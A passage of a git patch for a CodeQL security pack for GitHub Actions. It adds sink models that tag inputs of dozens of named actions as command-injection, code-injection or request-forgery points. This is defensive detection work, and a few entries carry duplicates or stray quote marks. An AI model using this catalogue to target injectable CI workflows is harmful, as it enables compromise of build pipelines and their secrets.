b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 000000000000..b3cb5aa39407 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 000000000000..a84880cfdf10 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 000000000000..f32484a4f0d3 --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml new file mode 100644 index 000000000000..9ce43e68a757 --- /dev/null +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml new file mode 100644 index 000000000000..ac3aaa67def0 --- /dev/null +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml new file mode 100644 index 000000000000..90fd673c705b --- /dev/null +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f587063..2c9f46b46f45 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 000000000000..1bcf8e7ce7ab --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 000000000000..817067445681 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 000000000000..aeca6db0d98d --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..b9358bd2d69a --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 000000000000..a18319954e3b --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c0..f46c40a8f9cb 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 000000000000..219de80c39e2 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 000000000000..dc3c2739e87f --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml new file mode 100644 index 000000000000..30679750f131 --- /dev/null +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] + - ["nick-fields/retry", "*", "input.command", "command-injection"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml new file mode 100644 index 000000000000..c600e7a93b64 --- /dev/null +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml new file mode 100644 index 000000000000..ed9088c9f568 --- /dev/null +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml new file mode 100644 index 000000000000..988c3d5e674f --- /dev/null +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml new file mode 100644 index 000000000000..91a3382348ca --- /dev/null +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 000000000000..d9d15dc94b27 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 000000000000..6bc0467692d2 --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 000000000000..62dea47d8184 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 000000000000..525d0199859d --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 000000000000..5aac0f894327 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 000000000000..d32c6509ad7e --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 000000000000..c4ea326ecef0 --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -0,0 +1,24 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml new file mode 100644 index 000000000000..7213a39f992b --- /dev/null +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 000000000000..3207c6d75211 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 000000000000..d00d78bcba8a --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 000000000000..e2813105bdc9 --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad72..d6ba27a50798 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c434403..413f4f3058bc 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 000000000000..42361b203e08 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 000000000000..474b36186b09 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 000000000000..73b93dbb88af --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 000000000000..4138b97f0fb2 --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 000000000000..1bcbac476a80 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef55..7c681d8a64b3 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 000000000000..3072c6f54fd3 --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml new file mode 100644 index 000000000000..5fe53ea3d079 --- /dev/null +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml new file mode 100644 index 000000000000..5e87f6c3b941 --- /dev/null +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml new file mode 100644 index 000000000000..dbe5d2d542dd --- /dev/null +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml new file mode 100644 index 000000000000..9ecbdb6329f5 --- /dev/null +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml new file mode 100644 index 000000000000..10920eb6bf59 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 000000000000..a1d49af08456 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 1e7414e5ce6d..9e94968e280c 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -21,7 +21,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From d21d453d1ccf9039b98df6adf0d6948dddf23743 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 118/707] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 000000000000..2a2225e17b6e --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -0,0 +1,38 @@ +/** + * @name Command built from user-controlled sources + * @description 